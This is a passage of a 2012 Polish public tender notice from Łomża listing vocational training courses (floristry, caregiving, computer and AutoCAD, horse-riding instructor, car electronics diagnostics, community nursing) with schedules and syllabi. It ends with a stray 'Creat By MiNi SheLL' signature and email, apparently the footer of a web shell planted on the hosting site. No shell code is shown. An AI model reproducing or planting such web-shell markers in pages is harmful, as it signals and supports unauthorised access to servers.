CEL SZKOLENIA:  nabycie wiedzy i umiejętności w zakresie florystyki 
ORGANIZACJA SZKOLENIA:  od poniedziałku do czwartku po 6 godzin, od 9:00 do 15:00

WYMAGANIA DODATKOWE: 

Program szkolenia powinien obejmować 100 godzin dydaktycznych zajęć teoretycznych i praktycznych. W godzinach tych należy ująć ocenę końcową uczestnika szkolenia (np. w formie egzaminu, testu, itp.)
Sposób organizacji zajęć: zajęcia muszą odbywać się w dni robocze, od poniedziałku do czwartku,  od 9:00 do 15:00 (6 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 7 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( np. 3 przerwy 15-minutowe)
Program szkolenia ma zawierać następujące zagadnienia:
sztuka kupowania kwiatów i zieleni ciętej,
przechowywanie i pielęgnacja roślin ciętych,
zasady tworzenia kompozycji roślinnych,
zasady i techniki układania bukietów okazjonalnych,
zasady i techniki układania kwiatów w naczyniach,
florystyka ślubna,
florystyka pogrzebowa,
zasady i techniki wykonywania stroików, wianków komunijnych i drobnych kwiatowych dekoracji,
techniki suszenia roślin i ich przechowywanie,
zasady i techniki wykonywania kompozycji z roślin zasuszonych i sztucznych,
aranżacja wnętrz kwiaciarni i kalkulacja kosztów
wikliniarstwo
kasa fiskalna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zorganizowanie Kursu   opiekun osób zależnych (opiekun osób starszych/ chorych/ niepełnosprawnych, opiekunka dziecięca, opiekun środowiskowy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs   opiekun osób zależnych (opiekun osób starszych/chorych/niepełnosprawnych, opiekunka dziecięca, opiekun środowiskowy)

LICZBA UCZESTNIKÓW: 6
TERMIN  REALIZACJI USŁUGI : sierpień  2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  przygotowanie uczestników do udzielania pomocy i świadczenia usług opiekuńczych w odniesieniu do osób przewlekle chorych, samotnych i niesamodzielnych oraz opieki nad dzieckiem
ORGANIZACJA SZKOLENIA: szkolenie winno odbywać się w miesiącu sierpniu, zajęcia  powinny być skumulowane i mają  odbywać się w dni robocze, od poniedziałku do piątku, od 8:00 do16:00

WYMAGANIA DODATKOWE: 
Program szkolenia powinien obejmować 120 godzin dydaktycznych  zajęć teoretycznych i praktycznych. W godzinach tych należy ująć ocenę końcową uczestnika szkolenia (np. w formie egzaminu, testu, itp.) 
Szkolenie odbywać się będzie od 8:00 do16:00 (8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 9 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( co najmniej 1 przerwa 30-minutowa oraz 3 przerwy 15-minutowe
szkolenie powinno obejmować zagadnienia z zakresu:
roli i zadań opiekuna, etyki opiekuna, form opieki i pomocy ludziom starszym, chorym, niesamodzielnym
organizowania i planowania pracy zgodnie z przepisami i zasadami bezpieczeństwa i higieny pracy
pielęgnowania podstawowego i opieki nad ludźmi przewlekle chorymi i niepełnosprawnymi
przepisów prawa dotyczących działań pomocowych i realizacji opieki nad podopiecznymi
zasad udzielania pierwszej pomocy w przypadkach zagrożenia zdrowia i życia podopiecznego
pomagania podopiecznemu w codziennych czynnościach domowych
aktywizowania podopiecznego do zwiększania jego samodzielności życiowej
mobilizowania podopiecznego do aktywnego spędzania czasu wolnego i rozwijania jego zainteresowań
pomocy przy usprawnianiu ruchowym chorego i niepełnosprawnego (elementy rehabilitacji i gimnastyki)
podejmowania współpracy ze środowiskiem podopiecznego, zespołami opiekuńczymi i terapeutycznymi
doradzanie w zakresie planowania i organizacji gospodarstwa domowego, 
kontaktowanie się z różnego rodzaju instytucjami w celu rozwiązywania problemów zdrowotnych, materialnych, mieszkaniowych, rodzinnych i prawnych podopiecznego, 
inicjowanie pozytywnych relacji międzyludzkich w najbliższym otoczeniu podopiecznego, a zwłaszcza z członkami jego rodziny
stosowanie podstawowych zasad i metod wychowania
stosowanie wybranych zabaw i gier wpływających na rozwój dziecka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zorganizowanie Kursu komputerowego skłądającego się z 4 modułów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs podstawy obsługi komputera z pakietem MS Office  

LICZBA UCZESTNIKÓW:  9
TERMIN  REALIZACJI USŁUGI :  wrzesień- listopad  2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  nabycie umiejętności samodzielnej pracy na komputerze
ORGANIZACJA SZKOLENIA: szkolenie zostanie przeprowadzone w systemie weekendowym (tj. w soboty i niedziele), od września, w godz. od 8:00 do 14:00, 

program szkolenia musi być zrealizowany w łącznym wymiarze 120 godzin dydaktycznych na każdego uczestnika szkolenia
Sposób organizacji zajęć: zajęcia muszą odbywać się w soboty i niedziele od 8:00 do 14:00 (6 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 7 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( np. 3 przerwy 15-minutowe)
szkolenie powinno obejmować zagadnienia z zakresu:
1.	Obsługa komputera, wprowadzenie do systemu Windows, drukowanie, budowa komputera klasy PC, urządzenia peryferyjne : układ klawiszy na klawiaturze, litery małe i wielkie, znaki diakrytyczne (polskie litery), funkcje poszczególnych klawiszy, ćwiczenia w pisaniu.
2.	Poruszanie się w systemie Windows, dostosowanie środowiska pracy do własnych potrzeb: pasek start, mój komputer, pulpit, panel sterowania, drukarki, kosz (przenoszenie do kosza, opróżnianie kosza), moje dokumenty, przełączanie i zamykanie okien, rodzaje dokumentów, rozszerzenia plików, dostosowanie wyglądu pulpitu. Zapisywanie i usuwanie dokumentów: pliki i foldery, drzewo folderów, zapisywanie dokumentów w określonym miejscu, wyszukiwanie plików i folderów, kopiowanie danych do schowka i wklejanie.
3.	Drukowanie - ustawianie parametrów wydruku: jakość wydruku, ustawianie papieru, rozmiar papieru, drukowanie dwustronne, kilka stron na arkuszu, wymiana pojemników z tuszem.
4.	Edytor tekstu: dostosowywanie pasków narzędzi do swoich aktualnych potrzeb, tworzenie nowego dokumentu, wpisywanie tekstu, formatowanie tekstu , akapity, edytowanie tekstu, przenoszenie go i kopiowanie, ustawianie parametrów strony, stosowanie tabulatorów do rozmieszczania tekstu w kolumnach, wstawianie nagłówka i stopki, wstawianie wypunktowania, wybór punktorów, wstawianie i formatowanie pola tekstowego, wstawianie numerów stron.
5.	Arkusz kalkulacyjny: arkusz kalkulacyjny - okno programu, omówienie menu, etapy tworzenia arkusza kalkulacyjnego, tworzenie nowego skoroszytu, wpisywanie danych do komórki, edycja komórek, scalanie komórek, automatyczne wypełnianie zakresu komórek, wprowadzanie prostych obliczeń, formatowanie tekstu i liczb.
6.	Internet: strony WWW, poczta elektroniczna, komunikatory: zasady funkcjonowania sieci Internet, usługi internetowe - omówienie: (poczta elektroniczna, witryny internetowe, gry i aplikacje wykorzystujące łącza internetowe)
7.	Przeglądarka internetowa: wpisywanie adresów stron WWW, szukanie stron internetowych w popularnych wyszukiwarkach, korzystanie z odsyłaczy, zapisywanie stron WWW, wypełnianie formularzy na stronach internetowych.
8.	Poczta elektroniczna: zakładanie konta poczty elektronicznej, zarządzanie folderami poczty elektronicznej, odbieranie poczty elektronicznej, wysyłanie wiadomości z załącznikiem, książka adresowa.
9.	Komunikatory internetowe na przykładzie Gadu-Gadu oraz Skype: założenie własnego konta w serwisie gadu-gadu, wyszukiwanie kontaktów, dodawanie do listy kontaktów, wpisywanie i wysyłanie wiadomości.
10.	Urządzenia peryferyjne: kopiowanie płyt CD/DVD, wypalanie płyt CD audio, nagrywanie na płytach CD/DVD danych z wybranej lokalizacji, opis funkcjonowania skanera, rodzaje skanowania, ustawienie parametrów skanowania, skanowanie zdjęć i zapisywanie do pliku graficznego, rodzaje przenośnych pamięci USB,  podłączenie do komputera, odczytywanie i zapisywanie danych na przenośnym dysku.
 Wykonawca zapewnieni każdemu uczestnikowi szkolenia stanowisko komputerowe z dostępem do Internetu (1 osoba - 1 komputer) oraz dostęp do przynajmniej 2 drukarek oraz pendrive o pojemności co najmniej 1 GB,

18.  Kurs obsługi komputera-poziom średniozaawansowany 

ILOŚĆ UCZESTNIKÓW: 4
TERMIN  REALIZACJI USŁUGI :  lipiec-wrzesień 2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  nabycie praktycznych umiejętności obsługi komputera na poziomie średniozaawansowanym
ORGANIZACJA SZKOLENIA: szkolenie zostanie przeprowadzone w okresie wakacyjnym, w dni powszednie (po 3 dni w każdym tygodniu: tj. we wtorek, środę i piątek) w godz. od 9:00 do 17:00, 

program szkolenia musi być zrealizowany w łącznym wymiarze 120 godzin dydaktycznych na każdego uczestnika szkolenia
Sposób organizacji zajęć: zajęcia muszą odbywać się 3 dni w każdym tygodniu: tj. we wtorek, środę i piątek) w godz. od 9:00 do 17:00,  (8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 9 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( co najmniej 1 przerwa 30-minutowa oraz 3 przerwy 15-minutowe
szkolenie powinno obejmować zagadnienia z zakresu:
1.	Pogłębienie wiedzy o systemie operacyjnym Windows (m.in. instalowanie sterowników i oprogramowania, obsługa zewnętrznych nośników danych)
2.	Poznanie bardziej zaawansowanych funkcji programu Microsoft Word (m.in. rozplanowanie tekstu w dokumencie, tabele i ich własności, nagłówki, stopki, przypisy i inicjały, korespondencja seryjna, wykresy, konspekty, punktory i numeracja, automatyczne spisy, style i formatowanie)
3.	Arkusz kalkulacyjny Excel  - opracowywanie danych w arkuszu, formatowanie arkusza, wykorzystanie funkcji matematycznych, statystycznych, funkcje daty i czasu, filtrowanie i wyszukiwanie danych (tabele przestawne)
4.	Power Point - przygotowywanie prezentacji, tworzenie nowej prezentacji, formatowanie tekstu z elementami grafiki, animacje i efekty specjalne, dźwięk i film w prezentacji, wystąpienie wspomagane prezentacją
5.	Internet ( w tym Outlook) 
 Wykonawca zapewnieni każdemu uczestnikowi szkolenia stanowisko komputerowe z dostępem do Internetu (1 osoba - 1 komputer). pendrive o pojemności co najmniej 1 GB, 


19. Grafika komputerowa i  tworzenie stron www

ILOŚĆ UCZESTNIKÓW: 5
TERMIN  REALIZACJI USŁUGI :  od dnia 23 lipca do 14 sierpnia 2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  nabycie praktycznych umiejętności z zakresu grafiki komputerowej i tworzenia stron www
ORGANIZACJA SZKOLENIA: szkolenie zostanie przeprowadzone w okresie wakacyjnym, w dni powszednie, w godz. od 9:00 do 17:00,  zajęcia skumulowane, nie mniej niż 4 razy w tygodniu ( nie mniej niż 36 godzin dydaktycznych tygodniowo)

program szkolenia musi być zrealizowany w łącznym wymiarze 120 godzin dydaktycznych na każdego uczestnika szkolenia
Sposób organizacji zajęć: zajęcia muszą odbywać się  w godz. od 9:00 do 17:00,  (8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 9 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( co najmniej 1 przerwa 30-minutowa oraz 3 przerwy 15-minutowe
szkolenie powinno obejmować zagadnienia z zakresu:
obsługę graficznych programów wektorowych ( tworzenie i obróbka grafiki wektorowej - CorelDraw, Illustrator), 
obsługę graficznych programów rastrowych ( tworzenie grafiki bitmapowej i komputerowa obróbka zdjęć - Photoshop, Photopaint),
animacje wektorowe i bitmapowe ( Flash, Corel RAVE, Image Rady),
tworzenie stron internetowych (optymalizacja grafiki www. - HTML, Flash, Image Rady), podstawy DTP ( QuarkxPress).
Wykonawca zapewnieni każdemu uczestnikowi szkolenia stanowisko komputerowe z dostępem do Internetu (1 osoba - 1 komputer). pendrive o pojemności co najmniej 1 GB, 
Z racji faktu iż jeden z uczestników kursu porusza się na wózku inwalidzkim wymaga się, aby lokal w którym odbędzie się kurs nie posiadał barier architektonicznych.

20. Programowanie  AUTOCAD 1, AUTOCAD 2

ILOŚĆ UCZESTNIKÓW: 1
TERMIN  REALIZACJI USŁUGI :   lipiec-sierpień 2012
MIEJSCE REALIZACJI USŁUGI: preferowane miasto Łomża, ewentualnie miejscowość oddalona nie dalej niż 150 km od Łomży
CEL SZKOLENIA:  nabycie praktycznej umiejętności obsługi  programu AutoCAD na poziomie podstawowym (AUTOCAD 1) oraz  nauka wykorzystania zaawansowanych technik projektowania wspomaganego komputerowo (AUTOCAD 2).
ORGANIZACJA SZKOLENIA: Wykonawca może dołączyć uczestnika szkolenia do grupy szkoleniowej, po wcześniejszym uzgodnieniu z Wykonawcą 

WYMAGANIA DODATKOWE:
wymagane jest przynajmniej 25 godzin dydaktycznych na każdy moduł szkolenia
Zakres szkolenia (AUTOCAD 1): 
wprowadzenie do pracy z programem, wyświetlanie rysunku, ustawienia rysunku, współrzędne i podstawowe narzędzia rysunkowe, tworzenie  i modyfikowanie geometrii dwuwymiarowej, zarządzanie cechami obiektów, techniki konstrukcyjne, obiekty tekstowe i ich style, wprowadzenie do wymiarowania, kreskowanie, wprowadzenie do wydruku
Zakres szkolenia (AUTOCAD 2): 
efektywna praca z zestawami wyborów, zaawansowane typy obiektów, bloki i ich atrybuty, rysunki odnośników zewnętrznych, obrazy rastrowe, praca na arkuszach , obiekty aplikacji zewnętrznych, wymiarowanie w przestrzeni modelu i papieru, elementy dostosowawcze programu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zorganizowanie kursu Instruktor jazdy konnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Instruktor jazdy konnej

ILOŚĆ UCZESTNIKÓW: 1
TERMIN  REALIZACJI USŁUGI :   sierpień 2012
MIEJSCE REALIZACJI USŁUGI:  na terenie Polski
CEL SZKOLENIA:  uzyskanie uprawnień instruktora jazdy konnej
ORGANIZACJA SZKOLENIA: w przypadku kursu odbywającego się poza miastem Łomża należy do ceny kursu doliczyć koszty wyżywienia i zakwaterowania,


WYMAGANIA DODATKOWE:

Program szkolenia powinien zawierać takie zagadnienia jak:
Przepisy jeździeckie i kodeks drogowy
Teoria i metodyka rekreacji ruchowej
Prowadzenie jazdy w terenie, w ujeżdżalni i rajdy konne, ćwiczenia gimnastyczne nas koniu i ćwiczenia usprawniające do jazdy
Praca z klientem indywidulanym oraz z grupą
Instruowanie uczestników jazd, dobieranie klientom ćwiczeń 
Organizacja rekreacji konnej (marketing, organizacja usług i imprez jeździeckich, hipoterapia) 

Kurs zakończy się wydaniem: 
zaświadczenia ukończenia kursu
certyfikatu ukończenia szkolenia w wersji polsko-angielskiej
legitymacji instruktorskiej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zorganizowanie kursu Diagnostyka elektrycznych i elektronicznych systemów samochodowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Diagnostyka elektrycznych i elektronicznych systemów 
samochodowych 


ILOŚĆ UCZESTNIKÓW: 1
TERMIN  REALIZACJI USŁUGI :  sierpień-31 października 2012
MIEJSCE REALIZACJI USŁUGI:  Łomża lub miejscowość oddalona nie dalej niż 150 km od Łomży
CEL SZKOLENIA:  przekazanie wiedzy dotyczącej budowy, działania oraz kontrola wybranych elementów za pomocą narzędzi diagnostycznych 	
ORGANIZACJA SZKOLENIA: organizacja szkolenia w systemie weekendowym

WYMAGANIA DODATKOWE:

Czas trwania szkolenia 40 godzin dydaktycznych
Program powinien zawierać następujące zagadnienia:
Instalacje elektryczne pojazdów samochodowych
Układy zapłonowe 
Akumulatory i alternatory
Układy rozruchu
Czujniki, osprzęt elektryczny
Układy wtryskowe
Przepływomierze
Zintegrowane układy zapłonowo-wtryskowe
Magistrala CAN
Szeregowa transmisja danych, magistrale komunikacyjne
Aparatura pomiarowa
Ćwiczenia- diagnostyka elementów sterujących i wykonawczych za pomocą narzędzi specjalistycznych, Symulacja uszkodzeń oraz odczyt kodów błędów urządzeniem diagnostycznym
Praktyka- umiejętność posługiwania się urządzeniami diagnostycznymi jak: KTS, oscyloskop, multimetr oraz przykłady z praktyki warsztatowej częstych uszkodzeń wybranych elementów mechatronicznych i elektronicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zorganizowanie kursu  pielęgniarki środowiskowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs pielęgniarki środowiskowej

ILOŚĆ UCZESTNIKÓW: 1
TERMIN  REALIZACJI USŁUGI :  sierpień-październik 2012
MIEJSCE REALIZACJI USŁUGI:  Łomża
CEL SZKOLENIA:  uzyskanie uprawnień pielęgniarki środowiskowej
ORGANIZACJA SZKOLENIA: zaproponowany przez  Wykonawcę

Program i czas trwania  szkolenia  musi być zgodny z  obowiązującymi w tym zakresie przepisami prawa wytycznymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com